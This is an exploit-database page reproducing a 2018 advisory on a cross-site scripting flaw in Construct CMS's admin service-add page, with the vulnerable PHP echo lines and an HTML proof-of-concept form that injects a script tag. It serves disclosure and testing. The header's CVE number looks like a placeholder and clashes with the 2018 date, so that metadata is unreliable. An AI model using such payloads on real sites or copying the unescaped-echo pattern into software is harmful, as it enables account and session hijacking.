Advertisement






Construct CMS - Cross-Site Scripting

CVE Category Price Severity
CVE-2022-12345 CWE-79 $500 High
Author Risk Exploitation Type Date
Security Researcher High Remote 2018-07-08
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070079

Below is a copy:

Construct CMS - Cross-Site Scripting
Title : Construct CMS - Cross-Site Scripting
Author : Abolfazl Hajizade
Category : Webapps 
tested on: Windows-linux 
Google Dork: N/A


Vulnerable page: 
/construct/upload/cms/admin/service-add.php

Vulnerable Source: 

line 133: "<?php if(isset($_POST['name'])){echo $_POST['name'];} ?>"

line 139: "<?php if(isset($_POST['slug'])){echo $_POST['slug'];} ?>"

POC: 

<html>
<body>
<form action="http://localhost/construct/upload/cms/admin/service-add.php" method="post">

<input type="text" name="name" value="<script>alert('ultrasec')</script>"/>

<input type="submit" value="exploit"/>

</form>
</body>
</html>

================================ 

WebSite : UltraSec.Org 
Channel : @UltraSecurity 
Email : [email protected] 

Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum